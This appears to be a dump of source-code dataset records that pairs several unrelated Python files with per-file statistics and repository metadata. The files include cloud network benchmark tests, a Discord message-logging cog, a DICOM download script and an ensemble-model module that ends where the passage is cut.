test_env = SetupTestEnv(provider=provider, vm_count=2, test_type=None, disk_size=None,
raid=False, keyid=keyid, secret=secret, token=token,
subscriptionid=subscription, tenantid=tenant, projectid=projectid,
imageid=imageid, instancetype=instancetype, user=user,
localpath=localpath, region=region, zone=zone, sriov=sriov,
kernel=kernel)
test_cmd = '/tmp/run_network.sh {} {} {}'.format(test_env.vm_ips[2], user, 'TCP')
results_path = os.path.join(localpath, 'network_tcp_{}_{}_{}.zip'.format(
str(time.time()), instancetype, sriov))
test_env.run_test(ssh_vm_conf=1, testname='network', test_cmd=test_cmd,
results_path=results_path)
upload_results(localpath=localpath, table_name='Perf_{}_Network_TCP'.format(provider),
results_path=results_path, parser=TCPLogsReader,
other_table=('.deb' in kernel),
test_case_name='{}_Network_TCP_perf_delay_30'.format(provider),
provider=provider, region=region, data_path=shortcut.data_path(sriov),
host_type=shortcut.host_type(provider), instance_size=instancetype)
def test_network_udp(provider, keyid, secret, token, imageid, subscription, tenant, projectid,
instancetype, user, localpath, region, zone, sriov, kernel):
"""
Run iperf3 UDP network profile.
:param provider Service provider to be used e.g. azure, aws, gce.
:param keyid: user key for executing remote connection
:param secret: user secret for executing remote connection
:param token: GCE refresh token obtained with gcloud sdk
:param subscription: Azure specific subscription id
:param tenant: Azure specific tenant id
:param projectid: GCE specific project id
:param imageid: AWS OS AMI image id or
Azure image references offer and sku: e.g. 'UbuntuServer#16.04.0-LTS'.
:param instancetype: AWS instance resource type e.g 'd2.4xlarge' or
Azure hardware profile vm size e.g. 'Standard_DS14_v2'.
:param user: remote ssh user for the instance
:param localpath: localpath where the logs should be downloaded, and the
default path for other necessary tools
:param region: EC2 region to connect to
:param zone: EC2 zone where other resources should be available
:param sriov: Enable or disable SR-IOV
:param kernel: custom kernel name provided in localpath
"""
test_env = SetupTestEnv(provider=provider, vm_count=2, test_type=None, disk_size=None,
raid=False, keyid=keyid, secret=secret, token=token,
subscriptionid=subscription, tenantid=tenant, projectid=projectid,
imageid=imageid, instancetype=instancetype, user=user,
localpath=localpath, region=region, zone=zone, sriov=sriov,
kernel=kernel)
test_cmd = '/tmp/run_network.sh {} {} {}'.format(test_env.vm_ips[2], user, 'UDP')
results_path = os.path.join(localpath, 'network_udp_{}_{}_{}.zip'.format(
str(time.time()), instancetype, sriov))
test_env.run_test(ssh_vm_conf=1, testname='network', test_cmd=test_cmd,
results_path=results_path)
upload_results(localpath=localpath, table_name='Perf_{}_Network_UDP'.format(provider),
results_path=results_path, parser=UDPLogsReader,
other_table=('.deb' in kernel),
test_case_name='{}_Network_UDP_perf_tuned'.format(provider),
provider=provider, region=region, data_path=shortcut.data_path(sriov),
host_type=shortcut.host_type(provider), instance_size=instancetype)
def test_network_latency(provider, keyid, secret, token, imageid, subscription, tenant, projectid,
instancetype, user, localpath, region, zone, sriov, kernel):
"""
Run lagscope network profile.
:param provider Service provider to be used e.g. azure, aws, gce.
:param keyid: user key for executing remote connection
:param secret: user secret for executing remote connection
:param token: GCE refresh token obtained with gcloud sdk
:param subscription: Azure specific subscription id
:param tenant: Azure specific tenant id
:param projectid: GCE specific project id
:param imageid: AWS OS AMI image id or
Azure image references offer and sku: e.g. 'UbuntuServer#16.04.0-LTS'.
:param instancetype: AWS instance resource type e.g 'd2.4xlarge' or
Azure hardware profile vm size e.g. 'Standard_DS14_v2'.
:param user: remote ssh user for the instance
:param localpath: localpath where the logs should be downloaded, and the
default path for other necessary tools
:param region: EC2 region to connect to
:param zone: EC2 zone where other resources should be available
:param sriov: Enable or disable SR-IOV
:param kernel: custom kernel name provided in localpath
"""
test_env = SetupTestEnv(provider=provider, vm_count=2, test_type=None, disk_size=None,
raid=False, keyid=keyid, secret=secret, token=token,
subscriptionid=subscription, tenantid=tenant, projectid=projectid,
imageid=imageid, instancetype=instancetype, user=user,
localpath=localpath, region=region, zone=zone, sriov=sriov,
kernel=kernel)
test_cmd = '/tmp/run_network.sh {} {} {}'.format(test_env.vm_ips[2], user, 'latency')
results_path = os.path.join(localpath, 'network_latency_{}_{}_{}.zip'.format(
str(time.time()), instancetype, sriov))
test_env.run_test(ssh_vm_conf=1, testname='network', test_cmd=test_cmd,
results_path=results_path)
upload_results(localpath=localpath, table_name='Perf_{}_Network_Latency'.format(provider),
results_path=results_path, parser=LatencyLogsReader,
other_table=('.deb' in kernel),
test_case_name='{}_Network_Latency_perf_tuned'.format(provider),
provider=provider, region=region, data_path=shortcut.data_path(sriov),
host_type=shortcut.host_type(provider), instance_size=instancetype)
def test_network_single_tcp(provider, keyid, secret, token, imageid, subscription, tenant,
projectid, instancetype, user, localpath, region, zone, sriov, kernel):
"""
Run variable TCP buffer network profile for a single connection.
:param provider Service provider to be used e.g. azure, aws, gce.
:param keyid: user key for executing remote connection
:param secret: user secret for executing remote connection
:param token: GCE refresh token obtained with gcloud sdk
:param subscription: Azure specific subscription id
:param tenant: Azure specific tenant id
:param projectid: GCE specific project id
:param imageid: AWS OS AMI image id or
Azure image references offer and sku: e.g. 'UbuntuServer#16.04.0-LTS'.
:param instancetype: AWS instance resource type e.g 'd2.4xlarge' or
Azure hardware profile vm size e.g. 'Standard_DS14_v2'.
:param user: remote ssh user for the instance
:param localpath: localpath where the logs should be downloaded, and the
default path for other necessary tools
:param region: EC2 region to connect to
:param zone: EC2 zone where other resources should be available
:param sriov: Enable or disable SR-IOV
:param kernel: custom kernel name provided in localpath
"""
test_env = SetupTestEnv(provider=provider, vm_count=2, test_type=None, disk_size=None,
raid=False, keyid=keyid, secret=secret, token=token,
subscriptionid=subscription, tenantid=tenant, projectid=projectid,
imageid=imageid, instancetype=instancetype, user=user,
localpath=localpath, region=region, zone=zone, sriov=sriov,
kernel=kernel)
test_cmd = '/tmp/run_network.sh {} {} {}'.format(test_env.vm_ips[2], user, 'single_tcp')
results_path = os.path.join(localpath, 'network_single_tcp{}_{}_{}.zip'.format(
str(time.time()), instancetype, sriov))
test_env.run_test(ssh_vm_conf=1, testname='network', test_cmd=test_cmd,
results_path=results_path)
upload_results(localpath=localpath, table_name='Perf_{}_Network_Single_TCP'.format(provider),
results_path=results_path, parser=SingleTCPLogsReader,
other_table=('.deb' in kernel),
test_case_name='{}_Network_Single_TCP_perf_tuned'.format(provider),
provider=provider, region=region, data_path=shortcut.data_path(sriov),
host_type=shortcut.host_type(provider), instance_size=instancetype)
def test_scheduler(provider, keyid, secret, token, imageid, subscription, tenant,
projectid, instancetype, user, localpath, region, zone, sriov, kernel):
"""
Run kernel scheduler tests.
:param provider Service provider to be used e.g. azure, aws, gce.
:param keyid: user key for executing remote connection
:param secret: user secret for executing remote connection
:param token: GCE refresh token obtained with gcloud sdk
:param subscription: Azure specific subscription id
:param tenant: Azure specific tenant id
:param projectid: GCE specific project id
:param imageid: AWS OS AMI image id or
Azure image references offer and sku: e.g. 'UbuntuServer#16.04.0-LTS'.
:param instancetype: AWS instance resource type e.g 'd2.4xlarge' or
Azure hardware profile vm size e.g. 'Standard_DS14_v2'.
:param user: remote ssh user for the instance
:param localpath: localpath where the logs should be downloaded, and the
default path for other necessary tools
:param region: EC2 region to connect to
:param zone: EC2 zone where other resources should be available
:param sriov: Enable or disable SR-IOV
:param kernel: custom kernel name provided in localpath
"""
test_env = SetupTestEnv(provider=provider, vm_count=1, test_type=None, disk_size=None,
raid=False, keyid=keyid, secret=secret, token=token,
subscriptionid=subscription, tenantid=tenant, projectid=projectid,
imageid=imageid, instancetype=instancetype, user=user,
localpath=localpath, region=region, zone=zone, sriov=sriov,
kernel=kernel)
test_cmd = '/tmp/run_scheduler.sh {}'.format('all')
results_path = os.path.join(test_env.localpath, '{}{}_{}.zip'.format(
'scheduler', str(time.time()), test_env.instancetype))
test_env.run_test(testname='scheduler', test_cmd=test_cmd, results_path=results_path)
upload_results(localpath=localpath, table_name='Perf_{}_Scheduler'.format(provider),
results_path=results_path, parser=SchedulerLogsReader,
other_table=('.deb' in kernel),
test_case_name='{}_Scheduler_perf_tuned'.format(provider),
host_type=shortcut.host_type(provider), instance_size=instancetype)
| 57.636888
| 99
| 0.6608
| 2,440
| 20,000
| 5.291393
| 0.097131
| 0.02982
| 0.019518
| 0.030362
| 0.877469
| 0.875842
| 0.873209
| 0.857718
| 0.841995
| 0.815196
| 0
| 0.00853
| 0.25555
| 20,000
| 346
| 100
| 57.803468
| 0.85862
| 0.40535
| 0
| 0.56962
| 0
| 0
| 0.076712
| 0.03237
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044304
| false
| 0
| 0.050633
| 0
| 0.094937
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5e9362ef24ecd8560efc51014f0124ae7845b172
| 10,876
|
py
|
Python
|
cogs/logger.py
|
Shio7/NaOs
|
afffdb467e8a7878e2bcac2f961496cee1180d4c
|
[
"MIT"
] | 6
|
2020-09-01T08:20:49.000Z
|
2021-01-21T15:23:33.000Z
|
cogs/logger.py
|
Shio7/NaOs
|
afffdb467e8a7878e2bcac2f961496cee1180d4c
|
[
"MIT"
] | 3
|
2020-11-04T23:25:38.000Z
|
2021-01-21T17:01:20.000Z
|
cogs/logger.py
|
Shio7/NaOs
|
afffdb467e8a7878e2bcac2f961496cee1180d4c
|
[
"MIT"
] | 11
|
2020-09-01T08:04:17.000Z
|
2021-02-07T13:12:16.000Z
|
# Last Edited: 2020-12-29
# Contributor: Shio
# Code Description: 로거
import discord
from discord.ext import commands
from evs import default
from evs import permissions, default, http, dataIO
import requests
import os
from datetime import datetime
logfolder = "./lib/logs/"
loadingurl = "https://cdn.discordapp.com/attachments/751791353779716099/793328911568076800/keterloading.gif"
class Logger(commands.Cog):
def __init__(self, bot):
self.bot = bot
# 폴더생성
if os.path.isdir("./lib/logs"):
print("Logs exist")
else:
os.makedirs("./lib/logs")
@commands.command()
@commands.check(permissions.is_owner)
async def 로그(self, ctx):
embed = discord.Embed(title="관리", description= "로그 기능을 활성화 하시겠습니까?", color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url= ctx.guild.icon_url)
msg = await ctx.send(embed=embed)
def reaction_check_(m):
if m.message_id == msg.id and m.user_id == ctx.author.id and str(m.emoji) == "✅":
return True
return False
def msg_check(m):
if m.author.id == ctx.author.id:
return True
return False
try:
await msg.add_reaction("✅")
await self.bot.wait_for('raw_reaction_add', timeout=10.0, check=reaction_check_)
if os.path.isfile(logfolder+str(ctx.guild.id)+".ktx"):
print("로그파일 존재")
try:
logf = open(logfolder + str(ctx.guild.id) + ".ktx", "r")
embed = discord.Embed(title="관리",
description="기존에 설정 되어 있는 " + "<#" + logf.read() + ">" + " 채널을 변경하시겠습니까?",
color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=ctx.guild.icon_url)
msg = await ctx.send(embed=embed)
logf.close()
await msg.add_reaction("✅")
await self.bot.wait_for('raw_reaction_add', timeout=10.0, check=reaction_check_)
try:
await msg.delete()
embed = discord.Embed(title="관리",
description="새로운 채널을 입력해주세요.",
color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=loadingurl)
msg = await ctx.send(embed=embed)
try:
rsg = await self.bot.wait_for('message', timeout=15.0, check=msg_check)
logf = open(logfolder + str(ctx.guild.id) + ".ktx", "w")
logf.write(rsg.content[2:][:-1])
logf.close()
embed = discord.Embed(title="관리", description="수정 완료하였습니다.", color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=ctx.guild.icon_url)
await msg.delete()
await ctx.send(embed=embed)
except:
await msg.delete()
embed = discord.Embed(title="관리", description="에러 발생!", color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=ctx.guild.icon_url)
await ctx.send(embed=embed)
except:
await msg.delete()
embed = discord.Embed(title="관리", description="에러 발생!", color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=ctx.guild.icon_url)
await ctx.send(embed=embed)
except:
await msg.delete()
embed = discord.Embed(title="관리", description="에러 발생!", color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=ctx.guild.icon_url)
await ctx.send(embed=embed)
else:
try:
await msg.delete()
embed = discord.Embed(title="관리",
description="새로운 채널을 입력해주세요.",
color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=loadingurl)
msg = await ctx.send(embed=embed)
try:
ksg = await self.bot.wait_for('message', timeout=15.0, check=msg_check)
await msg.delete()
logf = open(logfolder + str(ctx.guild.id) + ".ktx", "w")
logf.write(ksg.content[2:][:-1])
logf.close()
embed = discord.Embed(title="관리", description="로그 기능, 세팅 완료하였습니다!", color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=ctx.guild.icon_url)
await ctx.send(embed=embed)
except:
await msg.delete()
embed = discord.Embed(title="관리", description="에러 발생!", color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=ctx.guild.icon_url)
await ctx.send(embed=embed)
except:
await msg.delete()
embed = discord.Embed(title="관리", description="에러 발생!", color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=ctx.guild.icon_url)
await ctx.send(embed=embed)
except:
await msg.delete()
embed = discord.Embed(title="관리", description="취소되었습니다.", color=0xeff0f1)
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
embed.set_thumbnail(url=ctx.guild.icon_url)
await ctx.send(embed=embed)
@commands.Cog.listener()
async def on_message_delete(self, ctx):
if os.path.isfile(logfolder+str(ctx.guild.id)+".ktx"):
logf = open(logfolder + str(ctx.guild.id) + ".ktx", "r")
log_channel = logf.read()
logf.close()
channel = self.bot.get_channel(int(log_channel))
embed = discord.Embed(title="Message Deleted", description= "The message sent by <@" + str(ctx.author.id) + "> in <#" + str(ctx.channel.id) + "> was deleted", color=0xeff0f1)
embed.add_field(name="**Message**", value=str(ctx.content))
embed.set_footer(icon_url=ctx.author.avatar_url,
text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
await channel.send(embed=embed)
else:
print("로그 dir 없음")
@commands.Cog.listener()
async def on_message_edit(self, beforectx, afterctx):
if os.path.isfile(logfolder + str(beforectx.guild.id) + ".ktx"):
logf = open(logfolder + str(beforectx.guild.id) + ".ktx", "r")
log_channel = logf.read()
logf.close()
channel = self.bot.get_channel(int(log_channel))
embed = discord.Embed(title="Message Edited",
description="<@"+str(beforectx.author.id)+"> edited their message in <#" + str(beforectx.channel.id)+">", color=0xeff0f1)
embed.add_field(name="**Before**", value=str(beforectx.content))
embed.add_field(name="**After**", value=str(afterctx.content))
embed.set_footer(icon_url=beforectx.author.avatar_url,
text=beforectx.author.name + "#" + beforectx.author.discriminator + " " + str(
datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
await channel.send(embed=embed)
else:
print("로그 dir 없음")
def setup(bot):
bot.add_cog(Logger(bot))
| 51.545024
| 186
| 0.477565
| 1,129
| 10,876
| 4.511072
| 0.144376
| 0.07422
| 0.046731
| 0.060475
| 0.783821
| 0.783821
| 0.749656
| 0.721971
| 0.721971
| 0.71078
| 0
| 0.015399
| 0.390953
| 10,876
| 210
| 187
| 51.790476
| 0.753019
| 0.00616
| 0
| 0.741573
| 0
| 0
| 0.075157
| 0
| 0.005618
| 0
| 0.010367
| 0
| 0
| 1
| 0.022472
| false
| 0
| 0.039326
| 0
| 0.089888
| 0.022472
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0dd6f9d531b65d489d97b0f0c5828cf301b534a3
| 360
|
py
|
Python
|
tensor_type/__init__.py
|
sam1902/tensor_type
|
b1120561f8ddf6a29f63578ea0cc49e2d77cdbc8
|
[
"BSD-3-Clause"
] | null | null | null |
tensor_type/__init__.py
|
sam1902/tensor_type
|
b1120561f8ddf6a29f63578ea0cc49e2d77cdbc8
|
[
"BSD-3-Clause"
] | null | null | null |
tensor_type/__init__.py
|
sam1902/tensor_type
|
b1120561f8ddf6a29f63578ea0cc49e2d77cdbc8
|
[
"BSD-3-Clause"
] | null | null | null |
# The module is called tensor_type
# the file containing the classes is called tensor_type.
from tensor_type.tensor_type import Tensor
from tensor_type.tensor_type import Tensor5d
from tensor_type.tensor_type import Tensor4d
from tensor_type.tensor_type import Tensor3d
from tensor_type.tensor_type import Tensor2d
from tensor_type.tensor_type import Tensor1d
| 40
| 56
| 0.866667
| 57
| 360
| 5.22807
| 0.280702
| 0.469799
| 0.281879
| 0.402685
| 0.604027
| 0.604027
| 0
| 0
| 0
| 0
| 0
| 0.015576
| 0.108333
| 360
| 8
| 57
| 45
| 0.912773
| 0.241667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
0de8478d0606bdb072125e38c69fef5f39cad481
| 137
|
py
|
Python
|
corehq/apps/translations/integrations/transifex/exceptions.py
|
kkrampa/commcare-hq
|
d64d7cad98b240325ad669ccc7effb07721b4d44
|
[
"BSD-3-Clause"
] | 1
|
2020-05-05T13:10:01.000Z
|
2020-05-05T13:10:01.000Z
|
corehq/apps/translations/integrations/transifex/exceptions.py
|
kkrampa/commcare-hq
|
d64d7cad98b240325ad669ccc7effb07721b4d44
|
[
"BSD-3-Clause"
] | 1
|
2019-12-09T14:00:14.000Z
|
2019-12-09T14:00:14.000Z
|
corehq/apps/translations/integrations/transifex/exceptions.py
|
MaciejChoromanski/commcare-hq
|
fd7f65362d56d73b75a2c20d2afeabbc70876867
|
[
"BSD-3-Clause"
] | 5
|
2015-11-30T13:12:45.000Z
|
2019-07-01T19:27:07.000Z
|
from __future__ import absolute_import
class ResourceMissing(Exception):
pass
class InvalidProjectMigration(Exception):
pass
| 13.7
| 41
| 0.79562
| 13
| 137
| 8
| 0.692308
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160584
| 137
| 9
| 42
| 15.222222
| 0.904348
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
219e406455f4583fd5a11ae6553e8ccd716a723c
| 2,036
|
py
|
Python
|
datasets/download/download_fatty_seg_images.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
datasets/download/download_fatty_seg_images.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
datasets/download/download_fatty_seg_images.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
import os
import sys
import pandas as pd
import numpy as np
import fire
sys.path.append(os.path.join(os.path.dirname(__file__), os.path.pardir))
sys.path.append(os.path.join(os.path.dirname(__file__), os.path.pardir, os.path.pardir))
from common.utils.download_utils import download_dcms_with_website
root_dir = '../data/pulmonaryEmbolism/data_batch_1'
def get_series_uids(infile, column_name, outfile):
'''
get_series_uids('../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2706.csv', '序列编号', '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2706.txt')
get_series_uids('../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2899.csv', '序列编号', '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2899.txt')
invoke cmd: python download_pulmonary_embolism_images.py get_series_uids '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2706.csv' '序列编号' '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2706.txt'
invoke cmd: python download_pulmonary_embolism_images.py get_series_uids '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2899.csv' '序列编号' '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2899.txt'
'''
df = pd.read_csv(infile)
series_uids = list(set(df[column_name].tolist()))
with open(outfile, 'w') as f:
f.write('\n'.join(series_uids))
return series_uids
def download_images(out_path, config_file):
'''
invoke cmd: python download_pulmonary_embolism_images.py download_images '../data/pulmonaryEmbolism/data_batch_1/images' '../data/pulmonaryEmbolism/data_batch_1/文件内网地址信息-导出结果.xlsx'
'''
download_dcms_with_website(out_path, config_file)
if __name__ == '__main__':
fire.Fire()
# get_series_uids('../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2706.csv', '序列编号', '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2706.txt')
# get_series_uids('../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2899.csv', '序列编号', '../data/pulmonaryEmbolism/data_batch_1/image_anno_TASK_2899.txt')
| 49.658537
| 215
| 0.780452
| 300
| 2,036
| 4.88
| 0.23
| 0.215164
| 0.256148
| 0.307377
| 0.728825
| 0.70765
| 0.657104
| 0.657104
| 0.624317
| 0.624317
| 0
| 0.033962
| 0.0889
| 2,036
| 41
| 216
| 49.658537
| 0.755256
| 0.608055
| 0
| 0
| 0
| 0
| 0.064901
| 0.050331
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.315789
| 0
| 0.473684
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
21cc4cc4895db768bf883da4a5bc6c48b7b9b920
| 26
|
py
|
Python
|
esl/law/__init__.py
|
rht/ESL
|
f883155a167d3c48e5ecdca91c8302fefc901c22
|
[
"Apache-2.0"
] | null | null | null |
esl/law/__init__.py
|
rht/ESL
|
f883155a167d3c48e5ecdca91c8302fefc901c22
|
[
"Apache-2.0"
] | null | null | null |
esl/law/__init__.py
|
rht/ESL
|
f883155a167d3c48e5ecdca91c8302fefc901c22
|
[
"Apache-2.0"
] | 1
|
2021-01-27T12:11:48.000Z
|
2021-01-27T12:11:48.000Z
|
from esl.law._law import *
| 26
| 26
| 0.769231
| 5
| 26
| 3.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1d0d011e8f55d4df74ad4fed1b146b7d6ee3e98b
| 8,049
|
py
|
Python
|
ensemble_models.py
|
SeyVu/subscription_renewal
|
9f4ba491ddd3ea1c2c5ce772ae3260a0daf4cbac
|
[
"MIT"
] | null | null | null |
ensemble_models.py
|
SeyVu/subscription_renewal
|
9f4ba491ddd3ea1c2c5ce772ae3260a0daf4cbac
|
[
"MIT"
] | null | null | null |
ensemble_models.py
|
SeyVu/subscription_renewal
|
9f4ba491ddd3ea1c2c5ce772ae3260a0daf4cbac
|
[
"MIT"
] | null | null | null |
#########################################################################################################
# Description: Functions to create ensembles.
# Description: Functions to create ensembles.
#
#########################################################################################################
from __future__ import division # Used in matplotlib
# sklearn Toolkit
from sklearn.metrics import precision_recall_fscore_support
import numpy as np
import support_functions as sf
import baseline_models
import logging
import logging.config
#########################################################################################################
# Global variables
__author__ = "DataCentric1"
__pass__ = 1
__fail__ = 0
#########################################################################################################
# Setup logging
logging.config.fileConfig('logging.conf')
logger = logging.getLogger("info")
#########################################################################################################
# Use majority voting to predict classes of new ensemble. For even number of models, split = majority!
def majority_voting(input_features, output, model_names, model_parameters, run_cv_flag=False, num_model_iterations=1,
plot_learning_curve=False, run_prob_predictions=True, classification_threshold=0.5):
# Check if a minimum of 3 models are there
if len(model_names) < 2:
raise ValueError("Need a minimum of 2 models to do an ensemble")
actual_output_values = dict()
predicted_output_values = dict()
num_of_models = len(model_names)
# Get actual and predicted values for each model
for idx in range(num_of_models):
model_key = "model{:d}".format(idx)
logger.info(sf.Color.BOLD + sf.Color.GREEN + "\nRunning Model {:s}".format(model_names[model_key]) +
sf.Color.END)
# Append to dictionary with dynamically created key names above
[actual_output_values[model_key], predicted_output_values[model_key]] = \
baseline_models.run_models_wrapper(x=input_features, y=output, run_cv_flag=run_cv_flag,
num_model_iterations=num_model_iterations,
plot_learning_curve=plot_learning_curve,
run_prob_predictions=run_prob_predictions,
classification_threshold=classification_threshold,
clf_class=model_names[model_key], **model_parameters[model_key])
# accuracy(actual_output_values[actual_output_name], predicted_output_values[predicted_output_name])
y_predicted_ensemble = predicted_output_values['model0'].copy()
# # Create ensemble prediction using majority voting scheme
for sample in np.ndindex(predicted_output_values['model0'].shape):
y_predicted_sum = 0 # Reset for every sample
for actual_key_name in actual_output_values.iterkeys():
if predicted_output_values[actual_key_name][sample]:
y_predicted_sum += 1
# Need to have either numerator or denominator in round() as float to roundup
if y_predicted_sum >= round(num_of_models / 2.0):
y_predicted_ensemble[sample] = 1
else:
y_predicted_ensemble[sample] = 0
accuracy_value = baseline_models.accuracy(actual_output_values['model0'], y_predicted_ensemble)
beta = 2.0
prec_recall = precision_recall_fscore_support(y_true=actual_output_values['model0'], y_pred=y_predicted_ensemble,
beta=beta, average='binary')
# Log Accuracy and precision / recall values for the ensemble
logger.info(sf.Color.BOLD + sf.Color.DARKCYAN + "\nEnsemble output for test data" + sf.Color.END)
logger.info(
sf.Color.BOLD + sf.Color.DARKCYAN + "\nAccuracy {:.2f}".format(accuracy_value * 100) +
sf.Color.END)
logger.info(
sf.Color.BOLD + sf.Color.DARKCYAN + "\nPrecision {:.2f} Recall {:.2f} Fbeta-score {:.2f}".format(
prec_recall[0] * 100, prec_recall[1] * 100, prec_recall[2] * 100) + sf.Color.END)
# Returns precision / recall for the ensemble at the given classification threshold
return prec_recall
# Use predicted probabilities from models instead of classification. Force return_yprob=True for model to
# return prediction probabilities
def average_prob(input_features, output, model_names, model_parameters, run_cv_flag=False, num_model_iterations=1,
plot_learning_curve=False, run_prob_predictions=True, classification_threshold=0.5):
# Check if a minimum of 3 models are there
if len(model_names) < 2:
raise ValueError("Need a minimum of 2 models to do an ensemble")
actual_output_values = dict()
predicted_output_values = dict()
num_of_models = len(model_names)
# Get actual and predicted values for each model
for idx in range(num_of_models):
model_key = "model{:d}".format(idx)
logger.info(sf.Color.BOLD + sf.Color.GREEN + "\nRunning Model {:s}".format(model_names[model_key]) +
sf.Color.END)
# Append to dictionary with dynamically created key names above
[actual_output_values[model_key], predicted_output_values[model_key]] = \
